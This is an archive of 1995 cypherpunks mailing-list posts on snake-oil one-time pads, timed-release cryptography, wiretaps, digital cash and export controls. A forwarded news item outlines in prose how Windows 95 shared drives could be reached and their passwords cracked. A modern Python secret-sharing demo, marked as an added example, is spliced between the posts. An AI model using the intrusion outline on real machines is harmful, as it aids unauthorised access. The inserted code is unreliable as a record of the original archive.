>  technical sense or the historical sense.  But, I know enough not 
>  to comment on algorithms that I don't have access to.
>  
>  The algorithm will be published when patent protection is assured.
>  It is currently patent pending in several countries.
>  
>  As far as marketing goes, this product is not going to disappear.
>  We have been premarketing security technology for four years through
>  beta, and one year in pilot with international Fortune 100 companies.
>  The initial presentations on Internet about a year ago showed us that
>  the newness and complexity of the Algorithm had to be presented
>  one on one to the experts which Elementrix has done.  There is a 
>  long parade of companies that have implemented this technology but 
>  do not wish to be named, (Typical of any security implementation.) 
>  Those who do acknowledge the integrity of the products are noteworthy, 
>  Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun 
>  Mergent, and there will be many more.

Also noteworthy are those who have examined the product under NDA and
declined to give an endorsement.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Tue, 14 Nov 1995 04:42:06 +0800
To: cypherpunks@toad.com
Subject: Re: Register
Message-ID: <199511120442.VAA08265@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: viking@pacifier.com (Robert East)
>Date: Wed, 08 Mar 1995 22:46:45 -0800
>Subject: Register
>
>Register
>
>I'd like to sign up for email
>
>Bob

I'd like to sign up for a clue
 
Thanks!

:)

_____________________________________________________________

"We work in the dark  We do what we can  We give what we have
Our doubt is our passion  And our passion is our task   
The rest is the madness of art."  
                   --Henry James
___________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 13 Nov 1995 09:30:50 +0800
To: cypherpunks@toad.com
Subject: Re: expiration dates on cryptography
In-Reply-To: <acc62dde07021004cd59@[205.199.118.202]>
Message-ID: <483im9$ja@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <acc62dde07021004cd59@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
> Even the "timed-release cryptography" is NOT a pure cryptographic system,
> as the idea of "temporal state" in crypto is iffy. That is, clocks can be
> jiggered. Even "sealed clocks" can be jiggered.

True "timed-release crypto" isn't possible with pure mathematics,
because time never appears in mathematical equations.  Time does appear in
physical equations, so it's conceivable that a device could be built that
really wouldn't divulge a secret for a given length of time.  However,
I'm not sure how such a device would work, and I'm not sure it would be
practical for long periods (longer than a human lifetime).

What I'm really proposing is "event-release" crypto based on reputation,
with checks and balances so that you can minimize the necessary level of
trust and prove breach of contract.  I think this is a useful service,
because you can convince yourself that in practice, it wouldn't be
profitable for the crypto houses to default, nor for an attacker to
compromise every house.

Once you have event-release crypto, time-release is an easy special case,
with zero human interaction and thus fast turnaround and low cost; but
"the beginning of the twenty-first century" is just an event, as is "my
death" or "a horse with exactly three vowels in its name wins the 1996
Kentucky Derby".

I'm writing code for Tembel's Crypto House now, so I can get an empirical
grasp on this.

> "Self-destruct crypto" would work roughly the same way:
> 
> -- N agents holding pieces of puzzle, contracted to destroy those pieces on
> such-and-such date.

I don't see how this could work, considering that once there are copies
of a message in circulation among nontrusted parties it is impossible
to destroy the information.  Also, it's impossible to verify that an
agent has destroyed a message!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 13 Nov 1995 11:41:29 +0800
To: chen@intuit.com (Mark Chen)
Subject: Re: POTP Security
In-Reply-To: <9511120717.AA25332@doom>
Message-ID: <199511121045.CAA17461@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Anything calling itself a one-time-pad which isn't, imo should
not be trusted, even if r, s, a, d, h, (and everyone else) said the
algorithm was great.


> 
> 
> > On 11 10 95 jgrubs@left.webcasters.com inquired about POTP 
> > security: 
> >  
> >  What level of security does this cute, little puppy provide??? 
> >  
> >  
> > One approach to answering that inquiry is an excerpt from: 
> >  
> >  Date: Sat, 21 OCT 95 10:58:51 -0500 
> >  From: Paul Jackman <jacktech@delphi.com>
> >  Newsgroups: talk.politics.crypto
> >  Subject: Re: Elementrix One-Time Pad 
> > 
> >  
> >  ...mine [Jackman's background and experience] goes back to 1961 
> >  as Crypto Communications Control Command Center Supervisor for 
> >  the National Security Agency (NSA), and US Army Intelligence 
> >  Security.  Even so, I do not consider myself expert in either the 
> >  technical sense or the historical sense.  But, I know enough not 
> >  to comment on algorithms that I don't have access to.
> >  
> >  The algorithm will be published when patent protection is assured.
> >  It is currently patent pending in several countries.
> >  
> >  As far as marketing goes, this product is not going to disappear.
> >  We have been premarketing security technology for four years through
> >  beta, and one year in pilot with international Fortune 100 companies.
> >  The initial presentations on Internet about a year ago showed us that
> >  the newness and complexity of the Algorithm had to be presented
> >  one on one to the experts which Elementrix has done.  There is a 
> >  long parade of companies that have implemented this technology but 
> >  do not wish to be named, (Typical of any security implementation.) 
> >  Those who do acknowledge the integrity of the products are noteworthy, 
> >  Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun 
> >  Mergent, and there will be many more.
> 
> Also noteworthy are those who have examined the product under NDA and
> declined to give an endorsement.
> 
> 
> --
> Mark Chen 
> chen@intuit.com
> 415/329-6913
> finger for PGP public key
> D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 14 Nov 1995 04:47:25 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: ACLU Cyber-Liberties Update: Nov. 8, 1995
In-Reply-To: <199511111547.HAA08706@blob.best.net>
Message-ID: <Pine.D-G.3.91.951112031903.23834C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Nov 1995, James A. Donald wrote:

> At 05:15 PM 11/8/95 -0500, ACLUNATL@aol.com wrote:
> > According to the government's own statistics, 1,800 innocent conversations
> > are intercepted each and every time a wiretap or other form of electronic
> > surveillance is placed.
> 
> This seems curiously inefficient, even for government work.

Not at all.  When a wiretap goes up, agents listen to every call that 
goes to or from the phone.  If the call doesn't relate to anything 
"criminal," they must "minimize" the interception by not listening.  They 
can listen again after some minutes to see if the topic has changed.

The pre-wiretap minimization conference for agents is taken very 
seriously by ethical prosecutors (not an oxymoron for those who ask).  
Good agents (ditto) also take the briefing seriously.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 13 Nov 1995 20:05:11 +0800
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
Message-ID: <4845bj$7gb@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ack.  Corrections.

In article <483l88$1f0@yage.tembel.org>, I wrote:
> You could do this with a reflector $ct/2$ metres away, assuming your
> opponent and you are in the same location.

Also assuming your attacker cannot use the information until he can get
it back to Earth, or else he could just race towards the reflector and
catch it on the way back.

> the diameter of the solar system is about 5.4 light-hours

The *radius* of the solar system is about 5.4 light-hours.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 14 Nov 1995 00:16:11 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: [joke] Re: Who needs time vaults anyway?
In-Reply-To: <v02120d05accab753260f@[199.0.65.105]>
Message-ID: <Pine.3.89.9511121342.A25644-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Tasteless joke. Do not take seriously.

On Sat, 11 Nov 1995, Robert Hettinga wrote:

> What's that to keep that from happening on the net, just like our much
> maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
> escrow agent...

Oh you must mean those wily hackers at Digicrime. Way to go Matt. 
My server originally had trouble looking up the host; must have been some 
last-ditch effort by those spooks at SAIC (I did note some recent obituaries
and resignations on their board, heheh...). It's all fine now though.

Excellent means of gaining employment and weapons practice. Gives new 
meaning to the phrase "affirmative action hiring". (though I still haven't seen 
my last check in the mail, guys. Hint, hint, hint.)

Just wondering, does the company presently have a market quote for 
captive CS profs? (shaddup over there! stop counting primes already)

Looking forward to the forthcoming Blacknet Unspeakable Comm-Oddities 
Exchange (a rather nice slant on AMIX, eh?). (still selling those babies, 
Tim?)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@delhi.CS.Berkeley.EDU (David A Wagner)
Date: Tue, 14 Nov 1995 20:28:26 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <199511122205.RAA24984@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199511111800.NAA23831@jekyll.piermont.com>,
Perry E. Metzger <perry@piermont.com> wrote:
> 
> > Perhaps neural nets could be used in an unknown plain text, brute force
> > attack to automatically select possible decryptions for human examination. 
> > I don't know of any papers on the subject.
> 
> I remember seeing a good paper by our own David Wagner on how to do
> this without anything more than some ordinary statistics -- no
> complicated junk required. David, if you are reading this, could you
> comment?
> 

Check out
	http://www.cs.berkeley.edu/~daw/recog.ps
for a paper by Steve Bellovin & me on doing plaintext recognition
with ordinary statistics.

It has nothing to do with neural networks, though....
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMKZvoCoZzwIn1bdtAQHItQGA1jD4SjC1Vg1fwCO3VLJ7v+gUlUvncwhj
v2SwPURAjry2QAeWBNeL5hMJARQuQHNx
=Cepa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 13 Nov 1995 09:30:05 +0800
To: jerry the golden retriever <an407769@anon.penet.fi>
Subject: Re: hacker's dream [Win95]
In-Reply-To: <9511110629.AA27945@anon.penet.fi>
Message-ID: <Pine.ULT.3.91.951112170211.25412B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This article is basically true. I'm not sure what they mean by "creating 
a simple file on your local machine," though. Anybody?

Microsoft appears to have patched the SMB and C$ bugs, but in the 
US/English release only. Yusuf Mehdi sent me email Thursday promising 
that international patches would be available *within two weeks* --
there was no explanation for the delay, and I can think of none.

This is discussed a bit in article <4814sh$i3g@Networking.Stanford.EDU>
and followups, and a bunch of places on 
gopher://quixote.stanford.edu/1m/win95netbugs.

- -rich

On Sat, 11 Nov 1995, jerry the golden retriever wrote:

> 
> Windows 95 Is A Hacker's Dream Over The Internet
> CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the
> Internet, could be a dream made in hacker heaven. From seasoned propeller
> heads Newsbytes has contacted, it looks like Windows 95 could be more of a
> security nightmare than was first thought.
> 
> This is especially true where fixed link companies are concerned. An
> investigation of the new operating system, when hooked onto the Internet,
> leaves computers wide open. Executing a series of simple, uncomplicated
> commands opens up company and private users' computers to hacking the moment
> they access the Internet, claim some analysts.
> 
> Worse, they may never know it has been done. Using a simple Unix command, a
> hacker can locate the IP (Internet protocol) address of the subscriber logged
> into an Internet service provider. Then he needs only one more thing; a
> logged-on Internet user using Microsoft's new operating system.
> 
> For businesses with leased line Internet links, it can happen at any time,
> day or night. Once the IP address has been noted, the hacker simply creates a
> file through DOS on his own system, specifying the address and naming it.
> Using two other commands -- which purge the remote names on the IP, or
> Internet provider's port -- the system then refreshes and remaps itself in
> preparation to be accessed by the hacker's computer.
> 
> Because Windows 95 is designed with a networking capability, it leaves all
> computers in the office open to illegal access. Once the hacker has called up
> his Map Network Drive, the hard disk on his own machine cannot be
> differentiated from that of the genuine user. All that need be done then is
> to put in a common drive name, most obviously "C:\." For networked machines,
> the default "C$" is common.
> 
> This gives access to all files on the subscriber's drive. While Windows 95
> allows the user to protect the drive by giving it a password, computer
> experts Newsbytes talked to said that device won't necessarily lock out
> intruders. Because the operating system has no "audit" trail -- in other
> words, it does not log who or how someone is accessing the drive -- a hacker
> can spend weeks trying to discover the password. Password search programs,
> like Cracker, are readily available and can break through most simple
> password sequences.
> 
> (Joel McCormick & I.T. Daily/19951109)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 13 Nov 1995 12:58:17 +0800
To: cypherpunks@toad.com
Subject: Re: Market Value of Web Pages
Message-ID: <199511130435.UAA08914@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Nov 1995, Timothy C. May wrote:

> At 6:51 PM 11/9/95, Bill Frantz wrote:
> 
> >BTW - I don't think we should be talking about a penny/page cost because it
> >is way too high for the current market.  For example, my copy of Applied
> >Cryptography V2 cost about $.067/page AND came with the media to keep it
> >"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
> >also came with the media.  I would think that somewhere between 1/100 to
> >1/10 of a penny/page is closer to the current market value of the page
> >content.
> 
> With all due respect to Bill--his mention of agorics tells me he knows
> something about computational ecologies and markets--, there is no
> reasonable way to say what price is "closer to the current market value of
> the page content," except by what the market will bear!
> 
> Yes, a paperback novel is a penny a page or so. But a 5-page consultant's
> report that sells for $2000 has a "market value" to someone of $400 a page.
> You can all think of all kinds of other examples.

Actually, Tim, there are many examples we each could think of.

As an example, I'm presently preparing an unsolicited Security Review
report for a Fortune 500 company.  It's *priced* if you will in the mid
five figure range per page (and that includes the title page, the
appendices, and the pages which say on them, "this page left intentionally
blank"). 

(It's the short report ... the one which references RFC's rather than
including them.  The report that includes RFC's is priced significantly
lower when measured by weight ... i.e. cost/page metering.)

But the report's information value is truly *worth* a factor many, many
hundreds of times what the invoice rate bears or what the cost per page
would indicate.  For me, my current report is in fact a loss leader. 

Since my report IS unsolicited, I really don't even have any real
expectation that the invoice will be approved for payment.  My invoice is
not submitted on that basis.  I realize that I might not even receive
re-imbursement for my out-of-pocket expenses. 

The beneficiary might well think that the information is only worth the
value of a promotional mug or of a promo T-shirt, or maybe even worthless. 
Alternatively, the company might offer a complimentary copy of their
product or even just info-freeload as Netscape did with those Berkeley
hombre stud-muffins, some time ago. 

But the information within my unsolicited report is hopefully utilized
none the less, no matter what financial consideration is extended, because
the information is _actually_ priceless, even though the recipient might
consider that information to have only a nominal or "no, or little
compensable value". 

Information is interesting that way.

Because information is/was provided to them "freely" most firms will
not (generally) see any value in the information at all.  They happily
become information free-loaders.  It's paradoxical and ironic in an 
information age.

The huge bill I send out is, literally, the reality check.

No honest person would expect to take a dress home from a shop without
paying, but a lot of normally honest folk don't give a thought to taking
an armload of free information.  Which I guess is an interesting segue
into a basic briefing on "information value" theory. 

But that part will have to hold for a bit ... once I collect my thoughts
on how information philistines and information connoisseurs have differing
value judgments.  The implications might surprise people.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 13 Nov 1995 16:32:44 +0800
To: cypherpunks@toad.com
Subject: Re: "Industry Group Rebuffs U.S. on Encryption"
Message-ID: <199511130204.VAA08135@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:37 PM 11/9/95 +0100, someone who understandably prefers to be
Anonymous wrote:

>In only a few decades, crypto's gone from being unheard of to the object
>of an increasingly high-profile PR war over "domestic and international
>terrorists and criminals." The govt's position, however, hasn't changed
>substantially: it doesn't like crypto, and it never will.

It has changed substantially.  Once "born classified" and subject to prison
sentences during WWII, possession and use of crypto is now "legal as church
on a Sunday."  The government's position as late as 1978 (later in the case
of Admiral Bobby) was that open publication of cryptographic research was
good for a free trip to Leavenworth to make little ones out of big ones.
[The fact that they threatened a lot more than they actually prosecuted
doesn't mean that this wasn't their position.]  Things have changed.

>There will never
>be a time when the cops who pull you over or drop by for a visit will say,
>"Ma'am, if you've encrypted that, we respect the fact that you don't want
>anyone to see that--so we'll just be going now. You have a nice day, now,
>y'hear." And there will never be no cops.

It is easy to imagine such a thing since that is exactly what cops do now
when they encounter people committing acts which used to be felonies.  They
ignore them.  It is quite possible for social arrangements to change in such
a way that the sovereign is no longer held to be able to compel testimony or
the surrender of information.  Certainly, technological changes can make
cases where the cops are aware that you provably possess information rare.

There were no nation states or cops prior to 1600.  It is perfectly possible
that there will be no nation states or cops at some point in the future.
Since policing is a labor intensive occupation and as currently organized
suffers from socialist inefficiency, it may well be disintermediated.  Thus,
cryptographic protocols can (if desired) practically exclude the possibility
of theft (of digital goods).  And if the bulk of the world's economy
consists of digital goods/services (measured by value not volume or weight
obviously <g>) then computers and crypto may be enough.  
  
Nanotechnology may make self defense more efficient than "others" defense
and may make it so easy to defend against state power that it brings on the
collapse of the nation state.  Technological changes bring social changes.  

Full nanotechnology may not even be necessary.  A computer is a nanomachine.
The capabilities of these toys and the networks they run on may be enough in
and of themselves to weaken monopoly institutions of coercion beyond their
tipping points.

DCF

"Jan, you remember what happened 10 years ago today, don't you?  The world
ended.  As we know it don't you mean?"  -- Too much Firesign Theater, not
enough Calculus.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi (jerry the golden retriever)
Date: Tue, 14 Nov 1995 20:29:33 +0800
To: cypherpunks@toad.com
Subject: ecash in pcweek
Message-ID: <9511122125.AA09326@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Opinion: Digital Cash Takes Step Toward Reality

From PC Week for November 13, 1995 by Bill Machrone

Some people are always looking for new ways to make money. Other people
are always looking for new ways to spend money. They're running headlong
into one another on the Internet. Most of the digital cash and
electronic commerce schemes out there are still in their infancy, but
many of them are predicated on making a transaction fee off the people
who want to buy things in this new, electronic medium.

Making money from people spending money is hardly a shocking
proposition. But all the approaches that call themselves any kind of
"cash" are stretching the definition. To the best of my knowledge, cash
is the thing you can spend without having it cost you a cent, so to
speak.

The only way you'll see digital cash without transaction costs is if a
powerful but paternalistic ruling body gets into the business. That
doesn't mean if Microsoft builds it into the operating system, but
rather if the government gets involved and makes some form of electronic
money transfer legal tender, and therefore immune to fiscal
encumbrances. This isn't remotely close to happening, so don't get your
hopes up.

Meanwhile, things are getting pretty interesting in the real world of
digital-cash transactions. Digicash (www.digicash.com) has partnered
with the Mark Twain Bank to offer online shoppers a debit card-like "E-
cash" account that they can fill with real money and then use either in
normal purchases or microtransactions from vendors who accept E-cash.
You pay a combination of setup fees, monthly fees, and money-movement
fees, but the overall goal is to make the transactions painless,
transparent, and anonymous. The anonymity factor is a key component of
real cash and a design requirement of Digicash. It's extremely unlikely
that anyone could spoof the system and spend your money; yet you can re-
create your E-cash on your own machine if you have a disk crash.

Portland Software (www.portsoft.com) has also attacked the issue,
putting itself in the position of vendors who want to sell things
electronically. Its approach, called ZipLock, is suited to selling
software products on the spot but is also suitable for published
content, artistic images, and fonts. It approves your credit and goes
through an unlocking/decrypting routine on the spot. The ZipLock
transaction is much more like a normal credit-card transaction and in
fact uses the communications infrastructure built by a major credit-card
clearinghouse. In effect, it transforms your PC into a point-of-sale
terminal, where all you have to do is enter your credit-card number. If
you're ordering software or other electronically deliverable goods,
they're transmitted and decrypted on the spot. Other merchandise is
delivered via the usual direct-marketing vehicles. Fees are paid by the
merchant, which means that the transaction cost is built into the price.

Although E-cash and ZipLock are hardly the only two electronic-payment
schemes out there, their differences are instructive. Each appears to
have a significant, valid role in building consumer confidence in online
commerce.

Bill Machrone is vice president of technology for Ziff-Davis Publishing
Co. He can be reached at wmachrone (MCI Mail) or 72241,15 (CompuServe).
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 13 Nov 1995 14:12:40 +0800
To: cypherpunks@toad.com
Subject: Re: ACLU Cyber-Liberties Update: Nov. 8, 1995
Message-ID: <199511130552.VAA16515@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > According to the government's own statistics, 1,800 innocent conversations
>> > are intercepted each and every time a wiretap or other form of electronic
>> > surveillance is placed.
>> This seems curiously inefficient, even for government work.

There was a discussion on the radio the other day that indicated that
some drug dealers really _are_ encoding data on their phones - though
Clipper won't help at all.  The author was talking about hanging out with
undercover drug agents while doing research on a book about the Mob or drug
dealers or whatever.  He and the cop were in a bar where a bunch of
high-level dealers were hanging out; many of them were on their cellphones
having conversations about "The 'patio furniture' you ordered is here.
We can get you the 'three tables' on Tuesday; would you like a couple of
'chairs' with them also?"  :-)  The dealers weren't bothered by the cops
being there; their lawyers were over at the next table in case they were needed.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 13 Nov 1995 14:34:23 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Who needs time vaults anyway?
Message-ID: <199511130613.WAA12515@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:15 PM 11/11/95 -0800, Simon Spero <ses@tipper.oit.unc.edu> wrote:
>As for real time-release - how about just using conventional encryption, 
>and require it to be brute-forced?  ..... Moore's law .....

Moore's law is really unpredictable - you can't be sure if the rate of
increase will go up or down, which could affect brute-force time by a
factor of 1000 pretty easily, especially if it suddenly becomes convenient
to do something your crypto-algorithm happens to use.

Also, there's a cost problem - a large brute-force project which requires
N years to crack either needs to be ferociously expensive, or else it's
easy for somebody to put a bunch of machines together to crack it faster.
For anything that requires that level of paranoia, Moore's law probably makes
the timing too unpredictable.

It probably makes a lot more sense to just do contractual solutions,
with secret-sharing protocols to minimize the effects of cheating,
bankrupt service providers, and accidents.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
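
The threshold idea behind the "crypto house" proposal and the "secret-sharing protocols" suggestion in the messages above, as an added example (not code from any poster and not Tembel's Crypto House): a release key is split with Shamir's k-of-n scheme so that any k houses honoring the release event can rebuild it, while n-k houses can go bankrupt or default. The house names, the prime field, and the SHA-256 commitments used to identify a house that hands over a bogus share are assumptions of this example.

```python
from __future__ import annotations

import hashlib
import secrets

# Assumption: arithmetic is done in the prime field GF(2**127 - 1); the key
# being protected must be smaller than this prime.
PRIME = 2**127 - 1

# Hypothetical house names, constructed for this example.
HOUSES = ["house-a", "house-b", "house-c", "house-d", "house-e"]


def split_key(key: int, threshold: int, houses: list[str]) -> dict[str, tuple[int, int]]:
    """Give each house one point on a random polynomial f with f(0) = key."""
    if not 0 <= key < PRIME:
        raise ValueError("key must be in [0, PRIME)")
    if not 1 <= threshold <= len(houses):
        raise ValueError("threshold must be between 1 and the number of houses")
    # Degree threshold-1 polynomial: constant term is the key, the rest random.
    coeffs = [key] + [secrets.randbelow(PRIME) for _ in range(threshold - 1)]
    shares = {}
    for x, house in enumerate(houses, start=1):
        y = 0
        for c in reversed(coeffs):  # Horner evaluation of f(x) mod PRIME
            y = (y * x + c) % PRIME
        shares[house] = (x, y)
    return shares


def commit(share: tuple[int, int]) -> str:
    """Hash commitment the depositor publishes at deposit time, one per house."""
    x, y = share
    return hashlib.sha256(f"{x}:{y}".encode()).hexdigest()


def interpolate_at_zero(points: list[tuple[int, int]]) -> int:
    """Lagrange interpolation of f(0) from points with distinct x values."""
    total = 0
    for i, (xi, yi) in enumerate(points):
        num, den = 1, 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = (num * -xj) % PRIME
                den = (den * (xi - xj)) % PRIME
        total = (total + yi * num * pow(den, -1, PRIME)) % PRIME
    return total


def release(released: dict[str, tuple[int, int]],
            commitments: dict[str, str],
            threshold: int) -> tuple[int | None, list[str]]:
    """Combine what the houses handed over after the release event.

    Returns (key or None, sorted names of houses whose share failed its
    published commitment). Houses that handed over nothing are simply absent.
    """
    good, cheaters = [], []
    for house, share in released.items():
        if commit(share) == commitments.get(house):
            good.append(share)
        else:
            cheaters.append(house)
    if len(good) < threshold:
        return None, sorted(cheaters)
    return interpolate_at_zero(good[:threshold]), sorted(cheaters)


def demo() -> dict[str, object]:
    key = secrets.randbelow(PRIME)
    shares = split_key(key, 3, HOUSES)
    commitments = {h: commit(s) for h, s in shares.items()}

    # Two houses have gone bankrupt; the remaining three honor the contract.
    survivors = {h: shares[h] for h in ("house-a", "house-c", "house-e")}

    # One house hands over a bogus share; three honest ones still suffice.
    x, y = shares["house-b"]
    with_cheat = {h: shares[h] for h in ("house-a", "house-c", "house-d")}
    with_cheat["house-b"] = (x, (y + 1) % PRIME)

    # Only two houses cooperate: below the threshold, nothing is released.
    colluders = {h: shares[h] for h in ("house-a", "house-b")}

    return {
        "bankruptcies": release(survivors, commitments, 3) == (key, []),
        "cheater_named": release(with_cheat, commitments, 3) == (key, ["house-b"]),
        "below_threshold": release(colluders, commitments, 3) == (None, []),
    }


if __name__ == "__main__":
    print(demo())
```

The commitments only identify a bad share after the fact; they do not make a house release on time, which remains the contractual and reputational part of the proposal.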






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 13 Nov 1995 12:05:47 +0800
To: mark@lochard.com.au (Mark)
Subject: Re: Market Value of Web Pages
In-Reply-To: <199511130035.AA32505@junkers.lochard.com.au>
Message-ID: <199511130352.WAA02006@homeport.org>
MIME-Version: 1.0
Content-Type: text


	The point is that Microsoft Word doesn't have an 'encrypt'
button in the 'save' dialog.  This means that almost nothing gets
encrypted.  The NSA likes this, and keeps the ITARs around.

	(Someone might point out that this is why Colonel Bat Guano's
laptop had military secrets on it in plaintext when stolen out of his
car in the gulf war.)

Adam

Mark wrote:

| Off topic:
| Personally I don't see the relevance of ITAR and crypto any more. When was the
| last time any one was prosecuted under its statutes? What is the point of
| banning exportation of software which is widely available outside the US
| anyway? It's idiocy. Any foreign power or cartel wanting secure comms is not

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 13 Nov 1995 15:48:34 +0800
To: David A Wagner <daw@CS.Berkeley.EDU>
Subject: Re: Diffie-Hellman in GF(2^n)?
In-Reply-To: <199511122243.OAA18565@delhi.CS.Berkeley.EDU>
Message-ID: <Pine.SUN.3.91.951112224949.24714A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


> I don't know enough about number theory to judge for myself;
> but you can read the (long) paper yourself at
> 
> 	ftp://netlib.att.com/netlib/att/math/odlyzko/discrete.logs.ps.Z

Thanks for the reference.  The paper gives a running time of exp(c(n 
log n)^(1/2)) for discrete log in GF(p) and exp(c*n^(1/3)*(log n)^(2/3)) 
for discrete log in GF(2^n).  However, this paper was published in 1985. 
There is now an algorithm to calculate discrete logs in GF(p) in
exp(c*n^(1/3)*(log n)^(2/3)) (see prime.discrete.logs.ps.Z in the same
directory), so perhaps GF(2^n) isn't so bad after all. 

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lewell <jrl@trel.demon.co.uk>
Date: Mon, 13 Nov 1995 19:12:09 +0800
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
Message-ID: <v01530500accc226554a7@[158.152.10.34]>
MIME-Version: 1.0
Content-Type: text/plain


Dan Oelke writes:
>Now, if we just had objects between 1 and 10 light years away
>that you could bounce lasers off of...... ;-)

There are plenty of objects out there. But isn't there some danger of
attracting the attention of high-spending aliens?

----------------------------------------------------------------------------
John Lewell...66a St John's Wood High Street  London NW8 7SH  United Kingdom
tel: +44 171 722 3098...fax: +44 171 483 1063....email: jrl@trel.demon.co.uk
Trel...The Commercial Internet Product Finder..<http://www.lpac.ac.uk/Trel/>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 13 Nov 1995 23:41:34 +0800
To: cypherpunks@toad.com
Subject: Re: Market Value of Web Pages
In-Reply-To: <199511130435.UAA08914@jobe.shell.portal.com>
Message-ID: <199511130509.AAA00319@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> As an example, I'm presently preparing an unsolicited Security Review
> report for a Fortune 500 company.  It's *priced* if you will in the mid
> five figure range per page (and that includes the title page, the
> appendices, and the pages which say on them, "this page left intentionally
> blank"). 

What a ripoff. I'm preparing a solicited security report for a Fortune
500 copy right now. I'm writing it at my usual rate -- which is
